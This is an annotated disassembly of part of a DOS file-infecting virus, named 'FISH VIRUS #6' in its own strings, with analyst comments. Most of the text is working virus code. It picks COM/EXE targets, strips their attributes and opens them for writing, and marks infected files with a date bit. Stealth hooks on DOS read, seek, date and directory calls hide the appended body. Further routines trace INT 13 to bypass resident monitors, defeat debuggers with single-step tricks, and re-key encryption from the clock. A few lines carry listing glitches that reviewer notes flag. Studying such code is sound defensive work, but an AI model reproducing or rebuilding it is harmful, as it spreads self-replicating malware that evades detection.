3411:09F0 E8B9F7         CALL   01AC            ; SHARK2 - save regs internal
3411:09F3 1E             PUSH	DS 
3411:09F4 07             POP	ES 
3411:09F5 B95000         MOV	CX,0050 
3411:09F8 89D7           MOV    DI,DX           ; Filename now @ ES:DI
3411:09FA B300           MOV    BL,00           ; Assume current drive
3411:09FC 33C0           XOR	AX,AX 
;  If drive specification is included, snag it
3411:09FE 807D013A       CMP    Byte Ptr [DI+01],':'
3411:0A02 7505           JNZ	0A09 
3411:0A04 8A1D           MOV    BL,[DI]         ; Get letter
3411:0A06 80E31F         AND    BL,1F           ; Letter -> number, 'A' or 'a' = 1
3411:0A09 2E881E280E     MOV    CS:[0E28],BL    ; drive code
;  Search for end of filename, AL contains a zero.
;  At most 50h bytes are scanned (CX).
3411:0A0E F2             REPNZ	
3411:0A0F AE             SCASB
;  Determine the file extension (last 3 characters of filename).
;  This is done by converting to uppercase and adding them together.
;  Only the 8-bit sum is compared, so any extension whose three bytes add
;  up to the same value is accepted as well.
3411:0A10 8B45FD         MOV    AX,[DI-03]      ; Last 2 chars of ext
3411:0A13 25DFDF         AND    AX,DFDF         ; uppercase
3411:0A16 02E0           ADD	AH,AL 
3411:0A18 8A45FC         MOV    AL,[DI-04]      ; First char of ext
3411:0A1B 24DF           AND    AL,DF           ; uppercase
3411:0A1D 02C4           ADD	AL,AH 
3411:0A1F 2EC606200000   MOV	Byte Ptr CS:[0020],00 
3411:0A25 3CDF           CMP    AL,'C'+'O'+'M'  ; COM file
3411:0A27 7409           JZ	0A32 
3411:0A29 2EFE062000     INC	Byte Ptr CS:[0020] 
3411:0A2E 3CE2           CMP    AL,'E'+'X'+'E'  ; EXE file
3411:0A30 750D           JNZ    0A3F            ; MACKEREL1
;  This is an executable, clear carry.
3411:0A32 E852F7         CALL   0187            ; SHARK1 - rest regs internal
3411:0A35 F8             CLC	 
3411:0A36 C3             RET
                        DB      'MACKEREL'
;  (Continued from PIKE3 above) Not an executable, set carry.
3411:0A3F E845F7         CALL   0187            ; SHARK1 - rest regs internal
3411:0A42 F9             STC	 
3411:0A43 C3             RET
;  MACKEREL2 (0A44) -- Store the current PSP segment in CS:[0EA3].
;  BX is preserved. The DOS call goes through 0151.
3411:0A44 53             PUSH   BX
3411:0A45 B451           MOV    AH,51           ; Get PSP segment
3411:0A47 E807F7         CALL	0151 
3411:0A4A 2E891EA30E     MOV	CS:[0EA3],BX 
3411:0A4F 5B             POP	BX 
3411:0A50 C3             RET
;  0A51 -- Open the file named at DS:DX for read/write.
;  Out: BX = file handle, or FFFF on any failure.
;  Steps: 0D00, free-space check on the drive in CS:[0E28], save and clear
;  the file attributes, open, record a word from the drive parameter
;  block, then 0D80 restores the INT 13 and INT 24 vectors.
3411:0A51 E8AC02         CALL	0D00 
3411:0A54 52             PUSH	DX 
3411:0A55 B436           MOV    AH,36           ; Get free disk space
3411:0A57 2E8A16280E     MOV    DL,CS:[0E28]    ; Drive code
3411:0A5C E8F2F6         CALL	0151 
;  Multiply the returned AX, CX and BX together; each MUL leaves its
;  high word in DX. Fail when the last high word is zero and the low
;  word is under 4000h, i.e. too little free space.
3411:0A5F F7E1           MUL	CX 
3411:0A61 F7E3           MUL	BX 
3411:0A63 89D3           MOV	BX,DX 
3411:0A65 5A             POP	DX 
3411:0A66 0BDB           OR	BX,BX 
3411:0A68 7505           JNZ	0A6F 
3411:0A6A 3D0040         CMP	AX,4000 
3411:0A6D 7248           JB	0AB7 
3411:0A6F B80043         MOV    AX,4300         ; Get file attrs
3411:0A72 E8DCF6         CALL	0151 
3411:0A75 7240           JB	0AB7 
;  Save path offset, attributes and path segment; they are used at
;  091B-092D to put the attributes back.
3411:0A77 2E8916F40E     MOV	CS:[0EF4],DX 
3411:0A7C 2E890EF20E     MOV	CS:[0EF2],CX 
3411:0A81 2E8C1EF60E     MOV	CS:[0EF6],DS 
3411:0A86 B80143         MOV    AX,4301         ; Set file attrs
3411:0A89 33C9           XOR    CX,CX           ; to nothing
3411:0A8B E8C3F6         CALL	0151 
;  [0EDA] is cleared by 0D00 and incremented at 0EE9 when the far call
;  through [0E2D] returns carry; a non-zero value aborts here.
3411:0A8E 2E803EDA0E00   CMP	Byte Ptr CS:[0EDA],00 
3411:0A94 7521           JNZ    0AB7
;  Open file, read/write access
3411:0A96 B8023D         MOV	AX,3D02 
3411:0A99 E8B5F6         CALL	0151 
3411:0A9C 7219           JB     0AB7

3411:0A9E 8BD8           MOV	BX,AX 
3411:0AA0 53             PUSH	BX 
3411:0AA1 B432           MOV    AH,32           ; Get drive param blk
3411:0AA3 2E8A16280E     MOV    DL,CS:[0E28]    ; Drive code
3411:0AA8 E8A6F6         CALL	0151 
3411:0AAB 8B471E         MOV	AX,[BX+1E] 
3411:0AAE 2EA3EC0E       MOV	CS:[0EEC],AX 
3411:0AB2 5B             POP	BX 
3411:0AB3 E8CA02         CALL	0D80 
3411:0AB6 C3             RET	 
;  Failure exit: BX = FFFF.
3411:0AB7 33DB           XOR	BX,BX 
3411:0AB9 4B             DEC	BX 
3411:0ABA E8C302         CALL	0D80 
3411:0ABD C3             RET
;  0ABE -- "Infected?" test for the handle in BX.
;  If bit 7 of the device info is set (a character device), return with
;  ZF set. Otherwise get the file date and test bit 7 of its high byte.
;  Out: ZF clear = date marker present, ZF set = device or unmarked file.
;  AX, CX and DX are preserved; the POPs leave the flags untouched.
3411:0ABE 51             PUSH	CX 
3411:0ABF 52             PUSH	DX 
3411:0AC0 50             PUSH	AX 
3411:0AC1 B80044         MOV    AX,4400         ; IOCTL get device info
3411:0AC4 E88AF6         CALL	0151 
3411:0AC7 80F280         XOR	DL,80 
3411:0ACA F6C280         TEST	DL,80 
3411:0ACD 7409           JZ	0AD8 
3411:0ACF B80057         MOV    AX,5700         ; Get file time+date
3411:0AD2 E87CF6         CALL	0151 
3411:0AD5 F6C680         TEST	DH,80 
3411:0AD8 58             POP	AX 
3411:0AD9 5A             POP	DX 
3411:0ADA 59             POP	CX 
3411:0ADB C3             RET
;  0ADC -- Record the current position and size of the file on handle BX.
;  Out: CS:[0EA7]:[0EA5] = current file position,
;       CS:[0EAB]:[0EA9] = file size.
;  The file pointer is moved back to the recorded position before return.
;  Registers are saved by SHARK2 and restored by SHARK1.
3411:0ADC E8CDF6         CALL   01AC            ; SHARK2 - save regs internal
3411:0ADF 33C9           XOR	CX,CX 
3411:0AE1 B80142         MOV    AX,4201         ; Move file pointer (from current, +0)
3411:0AE4 33D2           XOR	DX,DX 
3411:0AE6 E868F6         CALL	0151 
3411:0AE9 2E8916A70E     MOV	CS:[0EA7],DX 
3411:0AEE 2EA3A50E       MOV	CS:[0EA5],AX 
3411:0AF2 B80242         MOV    AX,4202         ; Move file pointer (from end, +0)
3411:0AF5 33C9           XOR	CX,CX 
3411:0AF7 33D2           XOR	DX,DX 
3411:0AF9 E855F6         CALL	0151 
3411:0AFC 2E8916AB0E     MOV	CS:[0EAB],DX 
3411:0B01 2EA3A90E       MOV	CS:[0EA9],AX 
3411:0B05 B80042         MOV    AX,4200         ; Move file pointer (back to saved)
3411:0B08 2E8B16A50E     MOV	DX,CS:[0EA5] 
3411:0B0D 2E8B0EA70E     MOV	CX,CS:[0EA7] 
3411:0B12 E83CF6         CALL	0151 
3411:0B15 E86FF6         CALL   0187            ; SHARK1 - rest regs internal
3411:0B18 C3             RET
                        DB      'FISH'
;  I N T 2 1 / AH = 57 -- Get / Set file time+date
;  Stealth for the date marker. CS:[0EB3] looks like the flags image
;  handed back to the caller; bit 0 (carry) is cleared or set here.
;  AL = 0 (get): call DOS; if the date's high byte has bit 7 set,
;                subtract C8 so the caller sees the unmarked date.
;  AL = 1 (set): strip the marker from the caller's date, then add it
;                back when 0ABE reports the file as marked.
;  Any other AL goes to 0B7E.
3411:0B1D 0AC0           OR	AL,AL 
3411:0B1F 7522           JNZ	0B43 
3411:0B21 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0B27 E845F6         CALL   016F            ; COD2 - restore registers
3411:0B2A E824F6         CALL	0151 
3411:0B2D 720B           JB	0B3A 
3411:0B2F F6C680         TEST	DH,80 
3411:0B32 7403           JZ	0B37 
3411:0B34 80EEC8         SUB	DH,C8 
3411:0B37 E918F9         JMP	0452 
;  DOS reported an error: set the carry bit in the flags image.
3411:0B3A 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:0B40 E90FF9         JMP	0452 
3411:0B43 3C01           CMP	AL,01 
3411:0B45 7537           JNZ	0B7E 
3411:0B47 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0B4D F6C680         TEST	DH,80 
3411:0B50 7403           JZ	0B55 
3411:0B52 80EEC8         SUB	DH,C8 
3411:0B55 E866FF         CALL   0ABE            ; Infected?
3411:0B58 7403           JZ	0B5D 
3411:0B5A 80C6C8         ADD	DH,C8 
3411:0B5D E8F1F5         CALL	0151 
;  [BP-04] is presumably the caller's saved AX -- confirm against the
;  frame built outside this section. ADC copies DOS's carry into bit 0.
3411:0B60 8946FC         MOV	[BP-04],AX 
3411:0B63 2E8316B30E00   ADC	Word Ptr CS:[0EB3],+00 
3411:0B69 E945F9         JMP    04B1
;  I N T 2 1 / AH = 42 -- Move file pointer
;  Stealth for the file length: a seek relative to end of file on a
;  marked file has 0E00 subtracted from the 32-bit offset in the frame.
3411:0B6C 3C02           CMP    AL,02           ; code 2 = From end of file
3411:0B6E 750E           JNZ	0B7E 
;  If moving relative to end of file, subtract our target
3411:0B70 E84BFF         CALL   0ABE            ; Infected?
3411:0B73 7409           JZ     0B7E 
;  [BP-0A] and [BP-08] are presumably the caller's saved DX and CX.
3411:0B75 816EF6000E     SUB    Word Ptr [BP-0A],0E00 
3411:0B7A 835EF800       SBB	Word Ptr [BP-08],+00 
3411:0B7E E9CDF8         JMP    044E
;  If the system year is 1991 or later, print "FISH VIRUS #6" string and
;  halt. The test is CMP CX,07C7 followed by JB, so earlier years only
;  restore the registers and return.
3411:0B81 E8D8F5         CALL   015C            ; COD1 - save registers
3411:0B84 B42A           MOV    AH,2A           ; Get system date
3411:0B86 E8C8F5         CALL	0151 
3411:0B89 81F9C707       CMP    CX,07C7         ; 1991
3411:0B8D 720B           JB	0B9A 
3411:0B8F B409           MOV    AH,09           ; Output string
3411:0B91 0E             PUSH	CS 
3411:0B92 1F             POP	DS 
3411:0B93 BAAB01         MOV	DX,01AB 
3411:0B96 E8B8F5         CALL	0151 
3411:0B99 F4             HLT	 
3411:0B9A E8D2F5         CALL   016F            ; COD2 - restore registers
3411:0B9D C3             RET
;  I N T 2 1 / AH = 3F -- Read file or device
;  Stealth read for files that 0ABE reports as marked:
;    - the request is clipped to (file size - 0E00), so the appended
;      body is never returned;
;    - a read that starts within the first 1Ch bytes is answered from the
;      saved copy of the original bytes inside the appended body.
;  Scratch: CS:[0EAD] = buffer offset, CS:[0EAF] = bytes still wanted,
;           CS:[0EB1] = bytes already delivered.
;  A scanner that reads through this hook therefore sees the original
;  contents; comparison needs a clean boot.
3411:0B9E 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:0BA4 E817FF         CALL   0ABE            ; Infected?
3411:0BA7 74D5           JZ	0B7E 
3411:0BA9 2E8916AD0E     MOV	CS:[0EAD],DX 
3411:0BAE 2E890EAF0E     MOV	CS:[0EAF],CX 
3411:0BB3 2EC706B10E0000 MOV	Word Ptr CS:[0EB1],0000 
3411:0BBA E81FFF         CALL	0ADC 
;  DX:AX = size - 0E00 - position: bytes left before the appended body.
3411:0BBD 2EA1A90E       MOV	AX,CS:[0EA9] 
3411:0BC1 2E8B16AB0E     MOV	DX,CS:[0EAB] 
3411:0BC6 2D000E         SUB	AX,0E00 
3411:0BC9 83DA00         SBB	DX,+00 
3411:0BCC 2E2B06A50E     SUB	AX,CS:[0EA5] 
3411:0BD1 2E1B16A70E     SBB	DX,CS:[0EA7] 
3411:0BD6 7908           JNS	0BE0 
;  Position is already past the apparent end: report 0 bytes read.
3411:0BD8 C746FC0000     MOV	Word Ptr [BP-04],0000 
3411:0BDD E92DFA         JMP	060D 
;  High word zero and remainder not above the request: clip the count.
3411:0BE0 7508           JNZ	0BEA 
3411:0BE2 3BC1           CMP	AX,CX 
3411:0BE4 7704           JA	0BEA 
3411:0BE6 2EA3AF0E       MOV	CS:[0EAF],AX 
;  CX:DX = position. Only positions 0000..001C take the header path.
3411:0BEA 2E8B0EA70E     MOV	CX,CS:[0EA7] 
3411:0BEF 2E8B16A50E     MOV	DX,CS:[0EA5] 
3411:0BF4 0BC9           OR	CX,CX 
3411:0BF6 7505           JNZ	0BFD 
3411:0BF8 83FA1C         CMP	DX,+1C 
3411:0BFB 761A           JBE	0C17 
;  Ordinary read of the remaining count; the result is added to the
;  bytes already delivered and stored at [BP-04].
3411:0BFD 2E8B16AD0E     MOV	DX,CS:[0EAD] 
3411:0C02 B43F           MOV    AH,3F           ; Read file
3411:0C04 2E8B0EAF0E     MOV	CX,CS:[0EAF] 
3411:0C09 E845F5         CALL	0151 
3411:0C0C 2E0306B10E     ADD	AX,CS:[0EB1] 
3411:0C11 8946FC         MOV	[BP-04],AX 
3411:0C14 E99AF8         JMP	04B1 
;  Header path. SI = position; DI = 1C - (position + count) when the
;  request ends inside the header, else 0.
3411:0C17 89D7           MOV	DI,DX 
3411:0C19 89D6           MOV	SI,DX 
3411:0C1B 2E033EAF0E     ADD	DI,CS:[0EAF] 
3411:0C20 83FF1C         CMP	DI,+1C 
3411:0C23 7208           JB	0C2D 
3411:0C25 33FF           XOR	DI,DI 
3411:0C27 EB09           JMP    0C32
                        DB      'TUNA'
3411:0C2D 83EF1C         SUB    DI,+1C 
3411:0C30 F7DF           NEG	DI 
;  Seek to (size rounded up to 10h) - 0DFC + position. That is
;  presumably where the copy made at 0962-0969 sits in the file.
3411:0C32 8BC2           MOV	AX,DX 
3411:0C34 2E8B16A90E     MOV	DX,CS:[0EA9] 
3411:0C39 2E8B0EAB0E     MOV	CX,CS:[0EAB] 
3411:0C3E 83C20F         ADD	DX,+0F 
3411:0C41 83D100         ADC	CX,+00 
3411:0C44 83E2F0         AND	DX,-10 
3411:0C47 81EAFC0D       SUB	DX,0DFC 
3411:0C4B 83D900         SBB	CX,+00 
3411:0C4E 01C2           ADD	DX,AX 
3411:0C50 83D100         ADC	CX,+00 
3411:0C53 B80042         MOV    AX,4200         ; Move file pointer
3411:0C56 E8F8F4         CALL	0151 
;  Read 1C - DI - SI bytes of the saved original into the caller's buffer.
3411:0C59 B91C00         MOV	CX,001C 
3411:0C5C 29F9           SUB	CX,DI 
3411:0C5E 29F1           SUB	CX,SI 
3411:0C60 B43F           MOV    AH,3F           ; Read file
3411:0C62 2E8B16AD0E     MOV	DX,CS:[0EAD] 
3411:0C67 E8E7F4         CALL	0151 
;  Advance the buffer, reduce the remaining count, add to the total,
;  then continue at offset 1C with the ordinary read.
3411:0C6A 2E0106AD0E     ADD	CS:[0EAD],AX 
3411:0C6F 2E2906AF0E     SUB	CS:[0EAF],AX 
3411:0C74 2E0106B10E     ADD	CS:[0EB1],AX 
3411:0C79 33C9           XOR	CX,CX 
3411:0C7B B80042         MOV    AX,4200         ; Move file pointer
3411:0C7E BA1C00         MOV	DX,001C 
3411:0C81 E8CDF4         CALL	0151 
3411:0C84 E976FF         JMP    0BFD
;  TUNA2 -- SPOOF -- Skip over byte immediately after CALL
;  ANDs the word at CS:[0E31] with SP, then continues in SPOOF (0DC7).
;  Call sites in this listing are followed by a one-byte filler
;  (see 0D0A / 0D0D).
3411:0C87 2E2126310E     AND    CS:[0E31],SP
3411:0C8C E93801         JMP    0DC7            ; SPOOF
;  TUNA3
;  I N T 2 1 / AH = 4E,4F -- Search first/next match
;  Stealth for directory searches: the real call is made first, then the
;  returned entry is edited when its date carries the marker bit.
;  Bit 0 of CS:[0EB3] carries the carry result back to the caller.
3411:0C8F 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0C95 E8D7F4         CALL   016F            ; COD2 - restore registers
3411:0C98 E8B6F4         CALL   0151
3411:0C9B E8BEF4         CALL   015C            ; COD1 - save registers
3411:0C9E 7309           JNB    0CA9            ; a match was found
3411:0CA0 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:0CA6 E908F8         JMP    04B1
;  A match was found. Subtract the virus length from
;  infected files and normalize the date.
;  Offsets in the DTA entry at BX: 19 = high byte of the date,
;  1A/1C = low/high word of the size.
3411:0CA9 E899F9         CALL   0645                    ; Get DTA address
3411:0CAC F6471980       TEST   Byte Ptr [BX+19],80     ; file date
3411:0CB0 7503           JNZ    0CB5                    ; infected..
3411:0CB2 E9FCF7         JMP	04B1 
3411:0CB5 816F1A000E     SUB    Word Ptr [BX+1A],0E00   ; file size
3411:0CBA 835F1C00       SBB    Word Ptr [BX+1C],+00    ; file size
3411:0CBE 806F19C8       SUB    Byte Ptr [BX+19],C8     ; normalize date
3411:0CC2 E9ECF7         JMP	04B1 
;  The byte at 0CC5 is a lone filler byte, not an instruction.
3411:0CC5 EB
;  A spoof routine
;  NOTE(review): this looks like the move to the top of memory; confirm.
;  The segment in [0E45] is presumably the PSP. The byte at [0003] is
;  decremented, the size word at offset 0003 of the segment just below it
;  loses 0100h, and ES is set one past the shrunk block. 0800h words are
;  then copied downwards from DS:0FFE to ES:0FFE, and RETF continues at
;  ES:01DD in the copy.
3411:0CC6 8E06450E       MOV    ES,[0E45]
3411:0CCA 06             PUSH	ES 
3411:0CCB 1F             POP	DS 
3411:0CCC FE0E0300       DEC	Byte Ptr [0003] 
3411:0CD0 8CDA           MOV	DX,DS 
3411:0CD2 4A             DEC	DX 
3411:0CD3 8EDA           MOV	DS,DX 
3411:0CD5 A10300         MOV	AX,[0003] 
3411:0CD8 FECC           DEC	AH 
3411:0CDA 01C2           ADD	DX,AX 
3411:0CDC A30300         MOV	[0003],AX 
3411:0CDF 5F             POP	DI 
3411:0CE0 42             INC	DX 
3411:0CE1 8EC2           MOV	ES,DX 
3411:0CE3 0E             PUSH	CS 
3411:0CE4 1F             POP	DS 
3411:0CE5 E8DF00         CALL   0DC7            ; SPOOF
;  Filler byte after the CALL, stepped over by the INT 01 handler.
3411:0CE8 A1
3411:0CE9 BEFE0F         MOV    SI,0FFE
3411:0CEC B90008         MOV    CX,0800
3411:0CEF 89F7           MOV	DI,SI 
3411:0CF1 FD             STD	 
3411:0CF2 F3             REPZ	
3411:0CF3 A5             MOVSW	 
3411:0CF4 FC             CLD	 
;  Far return address = ES:01DD.
3411:0CF5 06             PUSH	ES 
3411:0CF6 B8DD01         MOV	AX,01DD 
3411:0CF9 50             PUSH	AX 
3411:0CFA 2E8E06450E     MOV	ES,CS:[0E45] 
3411:0CFF CB             RETF
;  Single step through INT13
;  Clears the error flag CS:[0EDA], saves the current INT 13 vector twice
;  ([0E2F]:[0E2D] and [0E3B]:[0E39]), sets mode byte [0E50] = 02 and
;  calls CARP1. It then jumps into the current INT 13 handler with
;  AX = 0 and the trap flag set. The handler at 0DE7 records CS:IP in
;  [0E2F]:[0E2D] once the traced code leaves the range it checks, and
;  resumes at 0D59.
;  From 0D59: INT 13 and INT 24 are pointed at offsets 0D90 and 0DC5 and
;  the old INT 24 vector is kept in [0E3F]:[0E3D].
;  Defensive note: tracing a handler chain with TF set to reach the
;  lowest-level disk entry bypasses resident monitors that hook INT 13.
3411:0D00 2EC606DA0E00   MOV	Byte Ptr CS:[0EDA],00 
3411:0D06 E8A3F4         CALL   01AC            ; SHARK2 - save regs internal
3411:0D09 0E             PUSH	CS 
3411:0D0A E87AFF         CALL   0C87            ; TUNA2
3411:0D0D 88                                    ; filler
3411:0D0E B013           MOV    AL,13
3411:0D10 1F             POP    DS
3411:0D11 E8FCF4         CALL   0210            ; CARP3 - get interrupt
3411:0D14 8C062F0E       MOV	[0E2F],ES 
3411:0D18 891E2D0E       MOV	[0E2D],BX 
3411:0D1C 8C063B0E       MOV	[0E3B],ES 
3411:0D20 B202           MOV	DL,02 
3411:0D22 891E390E       MOV	[0E39],BX 
3411:0D26 8816500E       MOV	[0E50],DL 
3411:0D2A E8C2F4         CALL   01EF            ; CARP1 -- single step
;  Stack is saved so the handler at 0E18 can restore it.
3411:0D2D 8926DF0E       MOV	[0EDF],SP 
3411:0D31 8C16DD0E       MOV	[0EDD],SS 
3411:0D35 0E             PUSH	CS 
3411:0D36 B8290C         MOV	AX,0C29 
3411:0D39 50             PUSH	AX 
;  Search segment 0070 for a CB (RETF) byte; its address is pushed below
;  as the return address handed to the traced handler.
3411:0D3A B87000         MOV	AX,0070 
3411:0D3D B9FFFF         MOV	CX,FFFF 
3411:0D40 8EC0           MOV	ES,AX 
3411:0D42 33FF           XOR	DI,DI 
3411:0D44 B0CB           MOV	AL,CB 
3411:0D46 F2             REPNZ	
3411:0D47 AE             SCASB	 
3411:0D48 4F             DEC	DI 
3411:0D49 9C             PUSHF	 
3411:0D4A 06             PUSH	ES 
3411:0D4B 57             PUSH	DI 
;  Set bit 8 (TF) in FLAGS, then enter the handler with AX = 0.
3411:0D4C 9C             PUSHF	 
3411:0D4D 58             POP	AX 
3411:0D4E 80CC01         OR	AH,01 
3411:0D51 50             PUSH	AX 
3411:0D52 9D             POPF	 
3411:0D53 33C0           XOR	AX,AX 
3411:0D55 FF2E2D0E       JMP    FAR [0E2D]
;  Resumed here from 0E22 after the trace.
3411:0D59 0E             PUSH	CS 
3411:0D5A 1F             POP	DS 
3411:0D5B E86900         CALL   0DC7            ; SPOOF
;  Filler byte after the CALL.
3411:0D5E 8C
;  NOTE(review): the byte column of the next line runs into the following
;  instruction (BA is the opcode of MOV DX), and the line after it is
;  printed with segment 3412 instead of 3411. Listing glitches only.
3411:0D5F B013BA         MOV    AL,13           ; BIOS int 13
3412:0D61 BA900D         MOV    DX,0D90
3411:0D64 E893F4         CALL   01FA
3411:0D67 B024           MOV    AL,24           ; Critical error INT24
3411:0D69 E8A4F4         CALL   0210            ; CARP3 - get interrupt
3411:0D6C 891E3D0E       MOV	[0E3D],BX 
3411:0D70 BAC50D         MOV	DX,0DC5 
3411:0D73 B024           MOV    AL,24           ; Critical error INT24
3411:0D75 8C063F0E       MOV	[0E3F],ES 
3411:0D79 E87EF4         CALL   01FA            ; CARP2 - set interrupt
3411:0D7C E808F4         CALL   0187            ; SHARK1 - rest regs internal
3411:0D7F C3             RET
;  0D80 -- Undo the temporary hooks installed by 0D00.
;  Restores INT 13 from CS:[0E39] and INT 24 from CS:[0E3D], the far
;  pointers saved by 0D00. Registers are saved and restored internally.
3411:0D80 E829F4         CALL   01AC            ; SHARK2 - save regs internal
3411:0D83 2EC516390E     LDS	DX,CS:[0E39] 
3411:0D88 B013           MOV    AL,13           ; BIOS disk access
3411:0D8A E86DF4         CALL   01FA            ; CARP2 - set interrupt
3411:0D8D 2EC5163D0E     LDS	DX,CS:[0E3D] 
3411:0D92 B024           MOV    AL,24           ; Critical error INT24
3411:0D94 E863F4         CALL   01FA            ; CARP2 - set interrupt
3411:0D97 E8EDF3         CALL   0187            ; SHARK1 - rest regs internal
3411:0D9A C3             RET
;  I N T 0 1 H
;  Replacement SINGLE STEP interrupt, INT 01H.
;  This is the interrupt routine to prevent DEBUG from tracing.
;  NOTE(review): SPOOF installs CS:0C6B as the INT 01 vector, which is
;  0130h below this listing address. The 0CB7 given in the original
;  note would instead match the handler at 0DE7. Confirm.
;  Frame after PUSH BP: [BP+02] = IP, [BP+04] = CS, [BP+06] = FLAGS.
;  The handler clears bit 8 (TF) in the stacked FLAGS and increments the
;  word at [BP+1A], presumably the return address of the CALL into
;  SPOOF, so that the filler byte after that CALL is skipped.
3411:0D9B 55             PUSH	BP 
3411:0D9C 89E5           MOV	BP,SP 
3411:0D9E 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0DA3 FF461A         INC	Word Ptr [BP+1A] 
3411:0DA6 5D             POP	BP 
3411:0DA7 CF             IRET
;  0DA8 -- Pass the request to the previous INT 21 handler with TF set.
;  Writes 0401 to the word at [0E50]: mode byte [0E50] = 01 and counter
;  byte [0E51] = 04, which the handler at 0E2C counts down. The flags
;  image in CS:[0EB3] is loaded with bit 8 (TF) set, then control goes to
;  the far pointer at CS:[0E35].
3411:0DA8 2EC706500E0104 MOV	Word Ptr CS:[0E50],0401 
3411:0DAF E83DF4         CALL   01EF            ; CARP1 - Disable single step
3411:0DB2 E8BAF3         CALL   016F            ; COD2 - restore registers
3411:0DB5 50             PUSH	AX 
3411:0DB6 2EA1B30E       MOV	AX,CS:[0EB3] 
3411:0DBA 0D0001         OR	AX,0100 
3411:0DBD 50             PUSH	AX 
3411:0DBE 9D             POPF	 
3411:0DBF 58             POP	AX 
3411:0DC0 5D             POP	BP 
3411:0DC1 2EFF2E350E     JMP    FAR CS:[0E35]
;  Lone byte, not an instruction.
3411:0DC6 89
;  SPOOF -- This routine skips over byte following the CALL.
;  It points INT 01 at CS:0C6B and sets bit 8 (TF) in FLAGS, so the
;  single-step handler runs while this routine executes. The handler's
;  INC of a stacked word is what steps over the filler byte placed after
;  each CALL to SPOOF. The filler bytes make a linear disassembly lose
;  alignment after such calls, and a debugger that owns INT 01 changes
;  the outcome. The INC / MUL / AAA result stored in [0E31] is not
;  otherwise used in this section.
3411:0DC7 E892F3         CALL   015C            ; COD1 - save registers
3411:0DCA B001           MOV    AL,01           ; Interrupt 01H
3411:0DCC BA6B0C         MOV	DX,0C6B 
3411:0DCF 0E             PUSH	CS 
3411:0DD0 1F             POP	DS 
3411:0DD1 E826F4         CALL   01FA            ; CARP2 - set interrupt
3411:0DD4 9C             PUSHF	 
3411:0DD5 58             POP	AX 
3411:0DD6 0D0001         OR	AX,0100 
3411:0DD9 50             PUSH	AX 
3411:0DDA 9D             POPF	 
3411:0DDB 40             INC	AX 
3411:0DDC F7E0           MUL	AX 
3411:0DDE 37             AAA	 
3411:0DDF A3310E         MOV	[0E31],AX 
3411:0DE2 E88AF3         CALL   016F            ; COD2 - restore registers
3411:0DE5 C3             RET
;  Lone byte before the handler, not an instruction.
3411:0DE6 FF
;  0DE7 -- Single-step (INT 01) handler used while tracing.
;  Frame after PUSH BP: [BP+02] = IP, [BP+04] = CS, [BP+06] = FLAGS of
;  the traced instruction. Mode byte CS:[0E50]:
;    02 (set by 0D00): record the traced CS:IP in [0E2F]:[0E2D], restore
;        the stack saved by 0D00 and resume at 0D59.
;    01 (set by 0DA8): count [0E51] down; at zero, stop tracing, write
;        fresh key bytes and XOR the resident copy.
;    00: record CS:IP and clear TF.
3411:0DE7 55             PUSH   BP
3411:0DE8 89E5           MOV    BP,SP
3411:0DEA 50             PUSH   AX
;  Keep stepping only while the traced CS is below C000 and above the
;  segment in CS:[0E47] (meaning of that bound not visible here).
3411:0DEB 817E0400C0     CMP    Word Ptr [BP+04],C000           ; In ROM?
3411:0DF0 730C           JNB	0DFE 
3411:0DF2 2EA1470E       MOV	AX,CS:[0E47] 
3411:0DF6 394604         CMP	[BP+04],AX 
3411:0DF9 7603           JBE	0DFE 
3411:0DFB 58             POP	AX 
3411:0DFC 5D             POP	BP 
3411:0DFD CF             IRET
3411:0DFE 2E803E500E01   CMP    Byte Ptr CS:[0E50],01
3411:0E04 7426           JZ	0E2C 
3411:0E06 8B4604         MOV	AX,[BP+04] 
3411:0E09 2EA32F0E       MOV	CS:[0E2F],AX 
3411:0E0D 8B4602         MOV	AX,[BP+02] 
3411:0E10 2EA32D0E       MOV	CS:[0E2D],AX 
;  Flags are still those of CMP [0E50],01: carry means the mode byte is 00.
3411:0E14 720F           JB	0E25 
3411:0E16 58             POP	AX 
3411:0E17 5D             POP	BP 
;  Launch EXE?
;  Restores SP and SS saved at 0D2D / 0D31, then resumes at 0D59.
3411:0E18 2E8B26DF0E     MOV	SP,CS:[0EDF] 
3411:0E1D 2E8E16DD0E     MOV	SS,CS:[0EDD] 
3411:0E22 E934FF         JMP    0D59
;  Clear TF in the stacked FLAGS so the traced code runs freely on IRET.
3411:0E25 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0E2A EBCF           JMP	0DFB 
3411:0E2C 2EFE0E510E     DEC	Byte Ptr CS:[0E51] 
3411:0E31 75C8           JNZ	0DFB 
3411:0E33 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0E38 E871F3         CALL   01AC            ; SHARK2 - save regs internal
3411:0E3B E81EF3         CALL   015C            ; COD1 - save registers
;  DL from the time call goes to CS:[0D51] and CS:[0D6E]; DH + DL from
;  the date call goes to CS:[0D84] and CS:[0DDC].
;  NOTE(review): if run-time offsets are listing addresses minus 0130h,
;  these four bytes are the immediates of the XOR instructions at 0E7E,
;  0E9B, 0EB1 and 0F09, i.e. the keys change with the clock. Confirm.
3411:0E3E B42C           MOV    AH,2C           ; Get system time
3411:0E40 E80EF3         CALL	0151 
3411:0E43 2E8816510D     MOV	CS:[0D51],DL 
3411:0E48 2E88166E0D     MOV	CS:[0D6E],DL 
3411:0E4D 80EC02         SUB    AH,02           ; Get system date, 2A
3411:0E50 E8FEF2         CALL	0151 
3411:0E53 02F2           ADD	DH,DL 
3411:0E55 2E8836840D     MOV	CS:[0D84],DH 
3411:0E5A 2E8836DC0D     MOV	CS:[0DDC],DH 
;  Point INT 01 at whatever currently handles INT 03.
3411:0E5F B003           MOV    AL,03           ; Breakpoint debug - INT3
3411:0E61 E8ACF3         CALL   0210            ; CARP3 - get interrupt
3411:0E64 06             PUSH	ES 
3411:0E65 1F             POP	DS 
3411:0E66 89DA           MOV	DX,BX 
3411:0E68 B001           MOV	AL,01 
3411:0E6A E88DF3         CALL   01FA            ; CARP2 - set interrupt
3411:0E6D E8FFF2         CALL   016F            ; COD2 - restore registers
3411:0E70 E85FF3         CALL   01D2            ; SHARK3
